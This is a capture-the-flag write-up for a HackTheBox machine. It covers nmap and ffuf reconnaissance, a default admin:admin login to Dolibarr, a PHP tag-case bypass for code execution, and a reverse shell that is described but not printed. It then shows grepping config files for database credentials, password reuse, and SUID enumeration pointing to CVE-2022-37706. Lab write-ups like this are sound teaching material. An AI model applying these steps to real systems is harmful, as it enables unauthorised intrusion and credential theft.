Port Scan#

The first thing I did was run nmap to discover the open ports on the target machine:

nmap -p- -sV -sC -oA nmap/nmap -v 10.10.11.11
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
[...]
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Virtual host#

Accessing the page running on port 80, we see that probably is a static website as demonstrated on Figure 1. At the bottom of the page, I see the DNS board.htb, as shown in Figure 2.

Figure 1: Homepage of ‘10.10.11.11’.

Figure 2: Discovery the DNS ‘board.htb’.

NOTE

As always, I added ‘board.htb’ to the /etc/hosts file.

Accessing the the page ‘board.htb’ returns an identical static site, so I started brute forcing with ffuf to see if it has any virtual host with the following command:

ffuf -w /seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://10.10.11.11/' -H 'Host: FUZZ.board.htb' -fs 15949
[...]
crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 192ms]

NOTE

I had to use the option ‘-fs 15949’ to filter results by size because if the Vhost is not valid, the server will just return the static website.

It was discovered that the VHOST ‘crm.board.htb’ returns a different page, and accesing it, we can see the Dolibarr login page as shown in Figure 3.

Figure 3: Dolibarr version ‘17.0.0’.

Searching on google we discover that the default credentials for Dolibarr are admin:admin. Trying that, and we are in! But once inside, it seems like we have limited permissions, and most of the features give us access denied, as see in Figure 4.

Figure 4: Dolibarr admin with limited permissions.

How the vulnerablility works#

1. First, if we don’t have one, we need to create a website and a new page.
2. Now with the page created, we click the “Edit HTML Source”.
3. 1. On this page, if we try to insert PHP code with the tag , it give us the following permission error.

Figure 5: Permission to write PHP code denied.

3. 2. But if we change the PHP tag to , it saves the page and executes the PHP code.

Figure 6: Successfully saved the page and executed the PHP code.

4. Now, we just need to send a reverse shell. I modified the PHP reverse shell from PentestMonkey to working with this CVE and waited for my connetion back.

User flag#

I got a shell as ‘www-data’, and while enumerating the open ports with ss -ltnp, I discovery that port 3306(MySql) is open, so I immediately started looking for its password in the Dolibarr configurate files.

Going to dolibarr folder, I used the following grep command to find out where the configurates are:
grep -ri 'db_name' | grep -v 'jquery'

Figure 7: Return of grep command.

It returned a lot of files, but the one that caught my attention was /htdocs/conf/conf.php.Opening the file and scrolling up, we find the credentials of the database, as demostrated at Figure 8.

Figure 8: Database credentials.

WARNING

Remember to keep it simple. The first time on the machine, I spend some time going down the rabbit hole of getting the hashes from the database and trying to crack them. Remember to go for easy wins first.

Now with that password, we can just run su - larrisa and paste the password we just got, and we will have the user flag in /home/larrisa/user.txt.

Root flag#

After manually enumerating for some time, I found some SUID binaries with the following find command:
find / -perm -u=s -type f 2>/dev/null

Figure 9: Return of the find command

Researching this binary, I found out that the version of enlightenment installed is vulnerable to Privilege Escalation with CVE-2022-37706.